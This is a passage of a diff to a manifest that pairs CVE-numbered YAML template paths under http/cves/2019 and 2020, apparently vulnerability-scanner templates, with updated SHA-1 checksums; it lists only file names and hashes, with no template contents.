+http/cves/2019/CVE-2019-13101.yaml:a2a632e54cddccaee9effe4844f8a873b728dc35 +http/cves/2019/CVE-2019-13392.yaml:17334f15559dd076fab6f71057a6d17bd81e6479 +http/cves/2019/CVE-2019-13396.yaml:edc16e834ab7130bd4a78f1dce409fe9bb1a2297 +http/cves/2019/CVE-2019-13462.yaml:d5f61f3b4adc7f30143d5cb225f9529d89ba0b69 +http/cves/2019/CVE-2019-14205.yaml:794ebe6439f61bfe64973e2790e46f152ceb55b0 +http/cves/2019/CVE-2019-14223.yaml:bfa751b74191106c210a2899db25813c7ff78181 +http/cves/2019/CVE-2019-14251.yaml:e5edfce134c1c8362fec90ac0650c81dfc2ca49f +http/cves/2019/CVE-2019-14312.yaml:128399e7d4367691df73cd65e3e74aee03220533 +http/cves/2019/CVE-2019-14322.yaml:8a5f7120a05939ac777c37d4265cac8d83a8e347 http/cves/2019/CVE-2019-14470.yaml:feb43273bc10cccf96b8e1fdfa8c3973442039ad -http/cves/2019/CVE-2019-14530.yaml:38077bc014a9a67fbaf899b1484eba0a50490540 -http/cves/2019/CVE-2019-14696.yaml:6f9b00b60a40272588e4a78312dfd0b0ee3fa0e7 -http/cves/2019/CVE-2019-14750.yaml:a5e8aec0b9c69f98080689162568cfda133e4518 -http/cves/2019/CVE-2019-14789.yaml:52abb08c5ec63ee098eda54de1ee83cd7d8560db -http/cves/2019/CVE-2019-14974.yaml:3632d41dca903c1560913829655e9d4e21c6dcf8 -http/cves/2019/CVE-2019-15043.yaml:c5ad4bc4b8d5454c9ed36d6f817dc654957a7185 -http/cves/2019/CVE-2019-15107.yaml:d8b013d16f302e17b91dda1a204c48cf24d62f2a -http/cves/2019/CVE-2019-15501.yaml:6f3de198f181fbdccd72ffd028c62355bb453bb8 -http/cves/2019/CVE-2019-15642.yaml:058c7b06499c1aa2814a63bc2f8ff7f5beaa7ac3 -http/cves/2019/CVE-2019-15713.yaml:f736796b425915557a0af038f5787cb7ca2f724f +http/cves/2019/CVE-2019-14530.yaml:a21235c8b43e59e40ad7d3c2372f53d54c794e99 +http/cves/2019/CVE-2019-14696.yaml:1d95b7c9e1cd841802f6ff592239bb2da0ebf1bf +http/cves/2019/CVE-2019-14750.yaml:6ca5ded0c6a2a0b01ec4fbd07a1c9d316532590d +http/cves/2019/CVE-2019-14789.yaml:9e084e98af571982c3541d7b6df97d5d4b5371cb +http/cves/2019/CVE-2019-14974.yaml:fab66c9fa2671fd957b866861070cf1f0c449e35 +http/cves/2019/CVE-2019-15043.yaml:2d8e17268051d372dd87356dd19d8ca95a03fd7a +http/cves/2019/CVE-2019-15107.yaml:a16ecd8b3d5b44ace9cc052b714f37939fb71209 +http/cves/2019/CVE-2019-15501.yaml:0ec7b6f2b9c32e42fafcea63e3fae54f222029e4 +http/cves/2019/CVE-2019-15642.yaml:19722b53950dd208a69868820a54683b5f9df13d +http/cves/2019/CVE-2019-15713.yaml:781dff249c59787481d73a69c64aacd876696fd6 http/cves/2019/CVE-2019-15811.yaml:f14050a032d55ce2ae1959a23cb97fe4cc75e464 -http/cves/2019/CVE-2019-15829.yaml:10a768c5e67f47db275127cc984d5b213b712e3f -http/cves/2019/CVE-2019-15858.yaml:a0e635f52e1fd2adc2edaa9d5bb8b4c55bfd2061 +http/cves/2019/CVE-2019-15829.yaml:04ddd730b7a1a6d44a336c026f75498bae79bec9 +http/cves/2019/CVE-2019-15858.yaml:eb8403399fcdbd8ce9a21529f60bfbf5988e172d http/cves/2019/CVE-2019-15859.yaml:45fdb86453346868de8338e41b0f108ee04042fc -http/cves/2019/CVE-2019-15889.yaml:bfefd89b0c46d2c26f9775821e1343b0877985e1 -http/cves/2019/CVE-2019-16057.yaml:52a4c6bc1414158b67c4ac5b42602b00fdce0030 -http/cves/2019/CVE-2019-16097.yaml:5a77bf9488ebe350646f38535af69ddaf02d019c +http/cves/2019/CVE-2019-15889.yaml:e7a0826e403bb9e010db73d1b13501080fd0217c +http/cves/2019/CVE-2019-16057.yaml:78eb40dc6d8f29b5201301f3c2bc6f04eebfdd1a +http/cves/2019/CVE-2019-16097.yaml:1cdd486d70f786e7904e3a7d94a8dd7cbf1ef8df http/cves/2019/CVE-2019-16123.yaml:9b28bd8cc89e8a3286374b34dd60bfcce4fe27d0 -http/cves/2019/CVE-2019-16278.yaml:828e6973ee7c8331a4e0e17076cc14d5f643756d +http/cves/2019/CVE-2019-16278.yaml:2cbf9691cd4104d2b340cd4d5e6925a41df947e3 http/cves/2019/CVE-2019-16313.yaml:2379d3c097b5e6a2915c5b8874f8700eff6656f2 http/cves/2019/CVE-2019-16332.yaml:6fc333ecc72bb9ae7f7cf1a81bf0e63501faee48 -http/cves/2019/CVE-2019-16469.yaml:b25f446b76a766a49987b92379d672217833ddb3 +http/cves/2019/CVE-2019-16469.yaml:6e85e9115e6650cd09da4d24f619843b9bc7ac11 http/cves/2019/CVE-2019-16525.yaml:51db7d84c840ddecfabe91c8b79dffc9e85b0700 http/cves/2019/CVE-2019-1653.yaml:8fbf1f7164f46c7bf4fbc5a14bdf3c6bc17fc9ce -http/cves/2019/CVE-2019-16662.yaml:76915baaa112a1a4584d7b3a28d3fd5c1ee2e216 -http/cves/2019/CVE-2019-16759.yaml:706469cd6c38ad257f95775393dd69e0ac289a5d +http/cves/2019/CVE-2019-16662.yaml:74f125a17be26af500bd726d9b5ab3861d713e2a +http/cves/2019/CVE-2019-16759.yaml:cbf9b83765f0228de77c73210d6d419fd8fd442c http/cves/2019/CVE-2019-16920.yaml:865e89896464d2b4a5e61700021863096a8a2bd2 -http/cves/2019/CVE-2019-16931.yaml:c246ea9699795a7cebfe29496f7b2efdee99d70d +http/cves/2019/CVE-2019-16931.yaml:d23e42b9b1dfd58ff1c5a89e26993c94e1cfd7b7 http/cves/2019/CVE-2019-16932.yaml:752a6400d3e725e0709b45b312927f30d3d82162 http/cves/2019/CVE-2019-16996.yaml:6af14042b97fa925502d1c0b180890cb8f30b9ac -http/cves/2019/CVE-2019-16997.yaml:e103b4c103866170ecfaef2fcf0e2cf88609b940 +http/cves/2019/CVE-2019-16997.yaml:32f2b19fd4b728b9f693d17169d7f74b32689d68 http/cves/2019/CVE-2019-17270.yaml:d48604df6ef77def3e7fa1c9f6f916233f0cf6e3 -http/cves/2019/CVE-2019-17382.yaml:f76bdf75f84fdcae6c031cc28c3420d8dc40f808 +http/cves/2019/CVE-2019-17382.yaml:de2261176c45bd15fbfbdae01f6bf94e23cc57e3 http/cves/2019/CVE-2019-17418.yaml:09d65f801c6153058cda117d92049c4ae9580a07 -http/cves/2019/CVE-2019-17444.yaml:d6edba4d216bc8c9a4592ee9455ff7c7e9279a1a +http/cves/2019/CVE-2019-17444.yaml:c6adc210bdcaf5fcbf8dc37346fabe38ebacd346 http/cves/2019/CVE-2019-17503.yaml:6701aacab1ee79d24acd3cbd1497fb50399ad671 http/cves/2019/CVE-2019-17506.yaml:b0db1a0dd94538fede1011a56f7f41708dc89d6d -http/cves/2019/CVE-2019-17538.yaml:6ee1fff5d758343db188de36fd0daf2c451c6c42 -http/cves/2019/CVE-2019-17558.yaml:f20a87b60a1601a2db4f365919c9cb223a362ded -http/cves/2019/CVE-2019-17574.yaml:57b052c0181498af298b110600687f6e85687032 -http/cves/2019/CVE-2019-17662.yaml:976666face26cda5c5604d59a5c494e127d64181 -http/cves/2019/CVE-2019-1821.yaml:12907634331acd7a34c3c1708e2d1d2f3faed7d9 -http/cves/2019/CVE-2019-18371.yaml:7b787967a5b266feccbe4583a765ae00f2967538 -http/cves/2019/CVE-2019-18393.yaml:f802be60a9ff03dc5b39a853f584e643fb6d3c2d -http/cves/2019/CVE-2019-18394.yaml:ebd3d137ec974702ffc2ab350d3e124c26b98aa9 +http/cves/2019/CVE-2019-17538.yaml:7a34111b1b615caf71f0d479eb8b6cc5e465ac29 +http/cves/2019/CVE-2019-17558.yaml:8f153604065b9c7744bd2246865b2e87c00e053b +http/cves/2019/CVE-2019-17574.yaml:892d01b36db1255d8007f717c1fb6c4d4f802588 +http/cves/2019/CVE-2019-17662.yaml:e6e3f40e798aad8fd78fb6f897f0a7ecae4a817d +http/cves/2019/CVE-2019-1821.yaml:d19e01b6b92ea25c70d576bb415da93aee8d4f0f +http/cves/2019/CVE-2019-18371.yaml:cb87df6d841c8de310c9421503698b22fe4689a7 +http/cves/2019/CVE-2019-18393.yaml:2fa5d07a297e08f62fe65b85a66468d1e91456e2 +http/cves/2019/CVE-2019-18394.yaml:f58089be77e0e2f5e5a34839f3c60d4715924666 http/cves/2019/CVE-2019-18665.yaml:ddd5fc6661c5a4d13da8ecba440daf78f4dec7f0 http/cves/2019/CVE-2019-18818.yaml:c8f04d93a506f8d1d801ba19e51d1dc4f5005d43 http/cves/2019/CVE-2019-18922.yaml:95118c0faac56d9ab7f7c0731d9ffd8d37413f74 http/cves/2019/CVE-2019-18957.yaml:0fa1c55cdae830f3c0a64b01886c2ec2c4f769b9 -http/cves/2019/CVE-2019-1898.yaml:048b57c805e227ddcc3c21c978505b63a5d566ed +http/cves/2019/CVE-2019-1898.yaml:f0f71275ec7d10e813cd556632ba7342580eced0 http/cves/2019/CVE-2019-19134.yaml:3db2b49e04e2ee29182af1285b416361be36a428 -http/cves/2019/CVE-2019-19368.yaml:17ca39c57aa39b08bbc6ef746db6453d8adb2694 +http/cves/2019/CVE-2019-19368.yaml:dd2b3f21190be0cf7506aa1910fce2e2ac085baf http/cves/2019/CVE-2019-1943.yaml:866d0aa9df67c656e9ff6b133d795e5da483b26b http/cves/2019/CVE-2019-19781.yaml:8818dd71d9de019748689ab135368ea27178f8ae http/cves/2019/CVE-2019-19824.yaml:32d5ce9eb42b06926942b7aa6aa1dad1436e97ac http/cves/2019/CVE-2019-19908.yaml:9f9fc75caaf52382b3e1342991443b636e222ae0 http/cves/2019/CVE-2019-19985.yaml:8f1e3cb36997db32ba57b1270de3f5692db1264a -http/cves/2019/CVE-2019-20085.yaml:f7fa88b2bcceac1f29b34acf3501461b662dcf50 -http/cves/2019/CVE-2019-20141.yaml:33c2eb017289fb6ee525f7e726c33492b6ab63c8 +http/cves/2019/CVE-2019-20085.yaml:b12a595f2f94c500147d19dc78114c8fb8b4d23f +http/cves/2019/CVE-2019-20141.yaml:ff23736b1373f16c104fcb0994fd115aa0dbd943 http/cves/2019/CVE-2019-20183.yaml:09eb91b7f52447d8655a37ed4bbe95300e7378bf -http/cves/2019/CVE-2019-20210.yaml:847f5403c0142e68850a5e3450ef3e249185e47d -http/cves/2019/CVE-2019-20224.yaml:fc85be3c997670ca1e5348b607ccf41e4d55b93c -http/cves/2019/CVE-2019-20933.yaml:db1e4b83b1104779afef526475ed1c95666d4be1 +http/cves/2019/CVE-2019-20210.yaml:33c5ab4fb84e026a52a44b982f8a3c68753ac9d4 +http/cves/2019/CVE-2019-20224.yaml:63c371fdb3627b07c5ca57bc82234ce2fd73dbf1 +http/cves/2019/CVE-2019-20933.yaml:b4ff75ea2a14351ba4455cc2049a5367d33bb5f6 http/cves/2019/CVE-2019-2578.yaml:a0704f60e75947e62e565cb45595a84b731dd81b http/cves/2019/CVE-2019-2579.yaml:f7deec158d506da6c216c93f0375f5a927317da4 http/cves/2019/CVE-2019-2588.yaml:c7f798622689a44bf38e9c96710add9c5bdcc5cd -http/cves/2019/CVE-2019-2616.yaml:6f2283969a597f2fc28123c41a23eeed8fb703d7 +http/cves/2019/CVE-2019-2616.yaml:3fe8eb3189261123c345704ad4e82e0cd5a6ecb4 http/cves/2019/CVE-2019-2725.yaml:c0b1c9de5b114881547faa1ecb3a9dfe55f3af0c -http/cves/2019/CVE-2019-2729.yaml:bf87afdf644054332c3852d32b4ac049bdb5a41e +http/cves/2019/CVE-2019-2729.yaml:34fe986223062b08b38a8a1da72390f96d7e35d8 http/cves/2019/CVE-2019-2767.yaml:9c9628b7dead68845570d0883068ad29cec11c69 http/cves/2019/CVE-2019-3396.yaml:24a87a48a55562a9f9284f20e9b59b12a0e52727 -http/cves/2019/CVE-2019-3398.yaml:28a532329e7e968c03dbdf7828c9b5e188d7c25f +http/cves/2019/CVE-2019-3398.yaml:359883860ff50c8282893320e98877cf4f201bf8 http/cves/2019/CVE-2019-3401.yaml:e919f1305ffa5044b5eac5e37d80178d8413aadf http/cves/2019/CVE-2019-3402.yaml:e875780f5316e2e685f55c79921cdcb90390396b -http/cves/2019/CVE-2019-3403.yaml:c7ee2f41bf43a7f9e58b58c6192d95b49f4dce1e -http/cves/2019/CVE-2019-3799.yaml:2040259742f87b2b202e0a00a32265820907d9ac -http/cves/2019/CVE-2019-3911.yaml:b70ddf7c2fc0b63f631bf59d603adc146565d1a6 -http/cves/2019/CVE-2019-3912.yaml:e5abef4495c21de0530d4b1f505004e099179d91 -http/cves/2019/CVE-2019-3929.yaml:1679f1f793d2ae98c8058c79570192a7775f09c6 -http/cves/2019/CVE-2019-5127.yaml:210a6682dca2a49c33269f9300db8cc29ef22f23 -http/cves/2019/CVE-2019-5418.yaml:08f3932cedc43cea226cdcd3e888717e32742b85 -http/cves/2019/CVE-2019-5434.yaml:a32a07229cfe54517484b78bdec6278cabf61620 -http/cves/2019/CVE-2019-6112.yaml:557fb23d574caeb2ff83513bafcf0ddd776a0ac1 -http/cves/2019/CVE-2019-6340.yaml:c0e85bf4c7d5a44b6a2288baf33daa21966dc5c3 -http/cves/2019/CVE-2019-6715.yaml:3e335ffc1bb0e3d32a7755cbeb02535407298af7 -http/cves/2019/CVE-2019-6799.yaml:86e0107a33657c4a446eae5ee6544633801be073 -http/cves/2019/CVE-2019-6802.yaml:04678947a8f58198df25d0b489029618cca2caff +http/cves/2019/CVE-2019-3403.yaml:cb860e2d12ba9f84068252624d4fa9c20a25ea55 +http/cves/2019/CVE-2019-3799.yaml:7ca01e8bc838b8f14b8ff2c3a7856d8ab4aa6db7 +http/cves/2019/CVE-2019-3911.yaml:60bad0968b361ad7400cbf147b011d9bd62f48a9 +http/cves/2019/CVE-2019-3912.yaml:fd327d636ba1fe5c3fdd1d923b23f4a3aa4b7842 +http/cves/2019/CVE-2019-3929.yaml:2a461f92bd310f46ab1c2cc3d4da0f237134675c +http/cves/2019/CVE-2019-5127.yaml:a8573a60af8fc2961f11b134e4b18dfb1e5643b6 +http/cves/2019/CVE-2019-5418.yaml:45c69bfdef5871a86b8ae2af518cbfaba298464c +http/cves/2019/CVE-2019-5434.yaml:ed7547e7f4361fb86514077654e2f3a0b8f1e9f4 +http/cves/2019/CVE-2019-6112.yaml:f7ddfaa256066a26aaedb8da74037292814708a5 +http/cves/2019/CVE-2019-6340.yaml:c5c4688ced3332dbb8ed7d9ce2ce28c67527c15d +http/cves/2019/CVE-2019-6715.yaml:cf0c3c5bb1820844c1046ee082bcf9f94675da40 +http/cves/2019/CVE-2019-6799.yaml:f6c533ec6b153c1c5da9f42082b8497c8d9138dd +http/cves/2019/CVE-2019-6802.yaml:df7d1b0093b3e31a4b7a40b4bfcbc06ddac09672 http/cves/2019/CVE-2019-7139.yaml:9ce4e6a9da54dabf3d98d063111cc7e8d337fef7 -http/cves/2019/CVE-2019-7192.yaml:40ab1445f19dcd09322617d418a9612eea02bac9 -http/cves/2019/CVE-2019-7219.yaml:6372986a8f04b8ace9c02f4973e0ee15ee51e08a -http/cves/2019/CVE-2019-7238.yaml:78115715b771474b691df0757ad350bd6dac77ca -http/cves/2019/CVE-2019-7254.yaml:fdc4ef2bf92b39668323124ef3a8f6baf371ea49 -http/cves/2019/CVE-2019-7255.yaml:fa259ac01c24c4d63bd06eec2175c3684258bb7b -http/cves/2019/CVE-2019-7256.yaml:5d6806e42a477175b41658e4caa26220448c073d +http/cves/2019/CVE-2019-7192.yaml:a3c022f3f5f609a34f4fff7c8584b27bbe280088 +http/cves/2019/CVE-2019-7219.yaml:22b58ee1a923ac844ea0def093b470e6271be400 +http/cves/2019/CVE-2019-7238.yaml:95354fb6a82023096eb5605d4c31f822955e5898 +http/cves/2019/CVE-2019-7254.yaml:58d2705cf5a3522943dc404d0605c0344f6e0ceb +http/cves/2019/CVE-2019-7255.yaml:15cd8a68db1d99991d667d66a6bc422d3e6aeca0 +http/cves/2019/CVE-2019-7256.yaml:3ac6d980c716565de1ef79f4d9bb3b4a9e387740 http/cves/2019/CVE-2019-7275.yaml:d251cbfb5bcd0cef05eae4ca47c159d2b03ce132 -http/cves/2019/CVE-2019-7315.yaml:2faa6e33a847eb3abff47be02c311cb501934551 +http/cves/2019/CVE-2019-7315.yaml:563d393bc73e5b333d833a2246ea88618f7dc974 http/cves/2019/CVE-2019-7481.yaml:7e3ebd3190512ff8d2949cb3522a11884b3e75c4 http/cves/2019/CVE-2019-7543.yaml:03e4e0a5e50bfb20f17e3b446c41035f56d6351a -http/cves/2019/CVE-2019-7609.yaml:9ac40649279f57ec29045a4a4ed3d48de3108eca -http/cves/2019/CVE-2019-8086.yaml:a33819614a6765bed584cff72b80ef7835ae71ed -http/cves/2019/CVE-2019-8390.yaml:3567fb9136558b8770d32f19bce1c17fbaf59177 -http/cves/2019/CVE-2019-8442.yaml:e59231257dea5b8c2b88eb8614bc115bd7230e2b -http/cves/2019/CVE-2019-8446.yaml:48b979313d1dd7be1971319f2506bf2b7eb716cc -http/cves/2019/CVE-2019-8449.yaml:e8c00f80088fdb8cacdd891ac50189d87a1bccc1 +http/cves/2019/CVE-2019-7609.yaml:6e6f132b4bfff1ae086c14c0e841c0f0d85b119e +http/cves/2019/CVE-2019-8086.yaml:52e596338a09e62826e3ee5b50068eb2775a858b +http/cves/2019/CVE-2019-8390.yaml:d3553e9ed80efd29280fae1a715cbcffc9530e09 +http/cves/2019/CVE-2019-8442.yaml:04a79ea9dfd14ec3a51f817ba469eefec9d6e506 +http/cves/2019/CVE-2019-8446.yaml:8c8d7da037e6deaaaba5ed387258e7bfa4fd6bbc +http/cves/2019/CVE-2019-8449.yaml:28d6468489990a531504fe946cd565726f84b734 http/cves/2019/CVE-2019-8451.yaml:814f3f055c890bf9f2018767b4db70a623fb351c http/cves/2019/CVE-2019-8903.yaml:187c434537693e85a8ff134a9c6ce0fd2912ebae -http/cves/2019/CVE-2019-8937.yaml:4e8bcc84d031de09ec8d9507f690ffaa4688fc90 -http/cves/2019/CVE-2019-8982.yaml:d9fecf28d730686c248d1a6d058f996e75fcf581 +http/cves/2019/CVE-2019-8937.yaml:9b9106c252c15d8df2fa8ebd0ae0f1ab36cb4bfb +http/cves/2019/CVE-2019-8982.yaml:e0d303e9104eb25c01b2f53d8bdef398a464cc40 http/cves/2019/CVE-2019-9041.yaml:1acd718661ba2a770f36087b628c659c058bf16c -http/cves/2019/CVE-2019-9618.yaml:7cd954481089220762074c96c5566d526a8e80e3 -http/cves/2019/CVE-2019-9632.yaml:33deb78b99ecc45949bc24de99485737903cf529 -http/cves/2019/CVE-2019-9670.yaml:a18440d50b9c44964110bd79367f44832d12b988 -http/cves/2019/CVE-2019-9726.yaml:2348d4154251c1d2aaf64b87a7f71aab89c05c5a -http/cves/2019/CVE-2019-9733.yaml:88c5ee149161dd7d261adf0a9213f697cc3396aa -http/cves/2019/CVE-2019-9915.yaml:5db8bc556847061de2e80b840ac8db3108b3a4da -http/cves/2019/CVE-2019-9922.yaml:330d1e80bceec49e71791b2fabe801787f16d3ff +http/cves/2019/CVE-2019-9618.yaml:bd20454a1919dd4b65ae2ff8c539ef0781605acf +http/cves/2019/CVE-2019-9632.yaml:a9b4273d963d3b99382bc05bb819a3f47bfa2b81 +http/cves/2019/CVE-2019-9670.yaml:8750d6eed79a4854dddbf7228f6e33488588d8d6 +http/cves/2019/CVE-2019-9726.yaml:22711bb0aaac4abb940352d002f34f101c1c831c +http/cves/2019/CVE-2019-9733.yaml:f98e32bd5d2c400b944115b429bb58a84f0cded3 +http/cves/2019/CVE-2019-9915.yaml:eb20be2c46939b6b57b4463f42bab1429f6a16b8 +http/cves/2019/CVE-2019-9922.yaml:f208a9a411ee06862f265c7a021195694b9806a6 http/cves/2019/CVE-2019-9955.yaml:aa1f5d5783764fa700842f5a8d7bec989d60f572 http/cves/2019/CVE-2019-9978.yaml:888dc6e81557675a2255e20d09d22c709863eede -http/cves/2020/CVE-2020-0618.yaml:c968e9dba735587f8cc98af60b2eb7af8c0dc18b +http/cves/2020/CVE-2020-0618.yaml:800965770c9aea20da669fe5083b4c0b2cb34461 http/cves/2020/CVE-2020-10148.yaml:bbb610b4e3403659c5f171819c0cace86262e009 -http/cves/2020/CVE-2020-10199.yaml:8f8827358cd1e51bdb2861c8be2f1acebfcdb3aa -http/cves/2020/CVE-2020-10220.yaml:67cd9de8eacd275c51360349e2dd8cf898733ff0 -http/cves/2020/CVE-2020-10546.yaml:ebb8f9d0186d72183551b7aa6346473ee4d80657 -http/cves/2020/CVE-2020-10547.yaml:3bd5b77cca4947473cd02b1d6b77a0d40bfdffcf -http/cves/2020/CVE-2020-10548.yaml:353e36f76e0e709c11285639e3d57be7c8e16a95 -http/cves/2020/CVE-2020-10549.yaml:1ce7fe816e4ed625dfef9722345fa4fffeb2e3ab -http/cves/2020/CVE-2020-10770.yaml:af7cc36095daffdb10505260f0a2866093e7f693 -http/cves/2020/CVE-2020-10973.yaml:24cf45621ff52a6f3e9d59d2fe264bd14deccbe8 -http/cves/2020/CVE-2020-11034.yaml:6c926829b0891f2046ec9e38a1795a29555693c6 -http/cves/2020/CVE-2020-11110.yaml:91bc83c50f26b96ad6025d57beb66f620223245e -http/cves/2020/CVE-2020-11450.yaml:a224335a601dff929ebb675ef1ee92fb1c504c4e +http/cves/2020/CVE-2020-10199.yaml:77d72c4b9762cd1ca9e0e2b0dbafd457d6e89583 +http/cves/2020/CVE-2020-10220.yaml:4778e319ea29668de75ddd08d835c101dca6ce91 +http/cves/2020/CVE-2020-10546.yaml:f4cfaba39bd36ea06f7ad20f779c8b892b327f95 +http/cves/2020/CVE-2020-10547.yaml:fccf2c60ed0d31406920c7f1c696c8e7e4f8a9f2 +http/cves/2020/CVE-2020-10548.yaml:c729f31eda87929ce0ef96b5c4bd29d439828b95 +http/cves/2020/CVE-2020-10549.yaml:8d62ce9548305a000a29ee4de7cab6deb2b057f3 +http/cves/2020/CVE-2020-10770.yaml:e91c721865dd2ff31cecf4aa60d6b51bd9561a4b +http/cves/2020/CVE-2020-10973.yaml:201cab00b4e2ace6f44b87582e5837359bb6731b +http/cves/2020/CVE-2020-11034.yaml:e3c027ab23fdced89e9e73cf36bcf8d1cc3390a0 +http/cves/2020/CVE-2020-11110.yaml:44cb6133ad238cbe045ef5abc513fb02b16fb78f +http/cves/2020/CVE-2020-11450.yaml:8756a2949a6c8fb8745f7349dc63d5eae6e07774 http/cves/2020/CVE-2020-11455.yaml:db648543edc249d1dda1a67313f2a1ba678f8ada http/cves/2020/CVE-2020-11529.yaml:3a4f8deb2ba9eb5e87c9a4c87aa59bd5bc8b39c3 -http/cves/2020/CVE-2020-11530.yaml:e4de2a4e8e617c78ba87fa185790a0495bf0e8da -http/cves/2020/CVE-2020-11546.yaml:0028a1adf59ba8524634f55e24652564fc5ce6b5 -http/cves/2020/CVE-2020-11547.yaml:494f8cc8b785fabe3ff98877a3174451aebc6daf -http/cves/2020/CVE-2020-11710.yaml:c2bde61a09512b2cc4c86a2d7bdaa5e85172896e -http/cves/2020/CVE-2020-11738.yaml:4c2e75351d44e91b76d713e865d22f88200e3567 -http/cves/2020/CVE-2020-11798.yaml:d9e0f98c88d58160585123f986858af68e699b2e -http/cves/2020/CVE-2020-11853.yaml:c5d11eb79e634cb7a91088fe76160f639712d927 -http/cves/2020/CVE-2020-11854.yaml:83b8968272ec2cd44a13434ee02a7d4a16128622 -http/cves/2020/CVE-2020-11930.yaml:4d997b58dee0b035f39ea9d3589c7a141cab7e42 -http/cves/2020/CVE-2020-11978.yaml:447d6b42a9d09489934f3c2389db422764017885 -http/cves/2020/CVE-2020-11991.yaml:3314b276c640c526eb12fcc56a4512066647df6c -http/cves/2020/CVE-2020-12054.yaml:0e9a43f56fe26a1d1a99d6100ebca7dc136b9cf6 -http/cves/2020/CVE-2020-12116.yaml:abb9cf66f2277f40b0946dbb7832c9260bb3bc15 -http/cves/2020/CVE-2020-12124.yaml:3638eeb2b36393ae2aba45461d293f2a1e2e75f5 -http/cves/2020/CVE-2020-12127.yaml:87c917e2c6ff2d5a6897a228c875b2f3a64b618b -http/cves/2020/CVE-2020-12256.yaml:b523d1dd854fac23adf5c34ee579f295b7b6d609 -http/cves/2020/CVE-2020-12259.yaml:484f27b534aafadde6a65e5e178d015194bf0345 +http/cves/2020/CVE-2020-11530.yaml:c8b08da8627b2000000190853448b23f342fbc57 +http/cves/2020/CVE-2020-11546.yaml:d36c933c917a36874cbe0bea23837423a0d0f984 +http/cves/2020/CVE-2020-11547.yaml:0438a800f5346bc94895d8d3ca876529e7e5b752 +http/cves/2020/CVE-2020-11710.yaml:a8eebe94fca4681df48465ce78931cfb6a15da9e +http/cves/2020/CVE-2020-11738.yaml:38359263c5d1dd96d14cb4e5c55af4abfc62fa51 +http/cves/2020/CVE-2020-11798.yaml:4fac247c7e85074886b2222c70d627c7956f52fb +http/cves/2020/CVE-2020-11853.yaml:e9d6c43bb2ec253628b47ead334f90ec94c898aa +http/cves/2020/CVE-2020-11854.yaml:3aefc5b8da8bc0ab3112afec13a9d1461a928de1 +http/cves/2020/CVE-2020-11930.yaml:14ed550a2b4ebc2783eb0b9095e0ca792528315c +http/cves/2020/CVE-2020-11978.yaml:511466908b771f79db4fff1bbba8ca24f6c3d704 +http/cves/2020/CVE-2020-11991.yaml:222fe8cf6c5c7a92134acf23ce2562ff01105ad2 +http/cves/2020/CVE-2020-12054.yaml:f12b823b465f98af2f1aec6deed88b59fc412bfd +http/cves/2020/CVE-2020-12116.yaml:21d8e5468b29dfb8d2cfdb1c172f5f34c2232d2c +http/cves/2020/CVE-2020-12124.yaml:70eed1ed97b7fdc2924b9fdefc780f1b363fff97 +http/cves/2020/CVE-2020-12127.yaml:c6001a6c3877da5a3ae09e444a0b127e366637ba +http/cves/2020/CVE-2020-12256.yaml:f34659b59eaa2e1c504e59820b83c7563c536061 +http/cves/2020/CVE-2020-12259.yaml:73dda606f0fdc6c667fe8b2c22c27752240b2392 http/cves/2020/CVE-2020-12447.yaml:25dca8fa73cb9a731e02a12b840d047144d60d13 -http/cves/2020/CVE-2020-12478.yaml:b3446ea4995c16bde11634d1be9d27c2adc81b95 -http/cves/2020/CVE-2020-12720.yaml:702c0295e7f153296fea255008e922f95972b2c0 +http/cves/2020/CVE-2020-12478.yaml:87e72cdc38005613a2284767f0a0225dc4cca51a +http/cves/2020/CVE-2020-12720.yaml:7b1db34fec447254d14245023e8a6c62d603d5e1 http/cves/2020/CVE-2020-12800.yaml:571e8c8b17acd08b60d0b8f28a12c6589caa253c -http/cves/2020/CVE-2020-13117.yaml:cf62563241ec58e319526c7cfcb36024e0ebbc44 -http/cves/2020/CVE-2020-13121.yaml:99e7149cef2ad1fbd47968099d2a83c0dc5f34df -http/cves/2020/CVE-2020-13158.yaml:01e90f7ef7945888ed0d18b2ed8dc9e222368879 -http/cves/2020/CVE-2020-13167.yaml:a99164b1f9e3321e13350533e700a641d4e14259 -http/cves/2020/CVE-2020-13258.yaml:b03f343371c7692bacbedd6e57803f077afe476e -http/cves/2020/CVE-2020-13379.yaml:af45b163a4c2e7c0b5dbc134667fbd1a05db9dfa -http/cves/2020/CVE-2020-13405.yaml:9fe62ed9413d58431e59fc951eede4197d4b7c33 -http/cves/2020/CVE-2020-13483.yaml:1611461e374d48e65f3afc56a8639fcbe49913cb -http/cves/2020/CVE-2020-13638.yaml:da0ccacc9c3922fb79a1fdffaca52d96ce67b39e +http/cves/2020/CVE-2020-13117.yaml:20ee55cb74559402ad4b5e5570ba452ea96d7dec +http/cves/2020/CVE-2020-13121.yaml:4e31f4f3965162eec18f0f5458571a6ef4e17c70 +http/cves/2020/CVE-2020-13158.yaml:8eaf68c6e18b2f37e3020a1373b4da7a0e43b36b +http/cves/2020/CVE-2020-13167.yaml:0bcb46d26cc1d9722db0635eee7b834b101f4f60 +http/cves/2020/CVE-2020-13258.yaml:e65163f41e4d4f35947ca9a75d56fc81fc33c672 +http/cves/2020/CVE-2020-13379.yaml:de18bb72cb84abdaf69c7ae1920c351d916f8978 +http/cves/2020/CVE-2020-13405.yaml:2fbea436dc186fe32b0d2238dd9727fe8114df9d +http/cves/2020/CVE-2020-13483.yaml:d032793a83c1391bdd6c380c0b9884e0546ddc58 +http/cves/2020/CVE-2020-13638.yaml:be73c7ba116e9ffec0963f335231be77e1c17bd0 http/cves/2020/CVE-2020-13700.yaml:33340a13d53c725023e61b3a6a08233a924c9584 -http/cves/2020/CVE-2020-13820.yaml:0f2d75fbe4dae33b055497874ad4b880136f03a7 -http/cves/2020/CVE-2020-13851.yaml:cae2a64c5d324f250e6a02f2e873a593fccf10ea -http/cves/2020/CVE-2020-13927.yaml:88ded4785d9bc515bbf4671246d79e2b52112129 -http/cves/2020/CVE-2020-13937.yaml:87cf74d00dd5bfd3afb56d868ebe3462f81d0931 +http/cves/2020/CVE-2020-13820.yaml:f086d3a425e3df203ee9494f60298903e18b8908 +http/cves/2020/CVE-2020-13851.yaml:1c69b7e31eae6d20b1256497c1e1c54b258e25ea +http/cves/2020/CVE-2020-13927.yaml:95f52804c9dbb6945f9f695890e1463749e6dc84 +http/cves/2020/CVE-2020-13937.yaml:b900a130f56309cb0078d02a0d75ccfe5b748194 http/cves/2020/CVE-2020-13942.yaml:0b3b785fa8404e80153dc4a82d8a016e432b4d4e -http/cves/2020/CVE-2020-13945.yaml:e571bd66bcf7ff4f313e3ec024c4831942788262 +http/cves/2020/CVE-2020-13945.yaml:00ce29da8821ba109bf480c70d67d6dcfc8faa5b 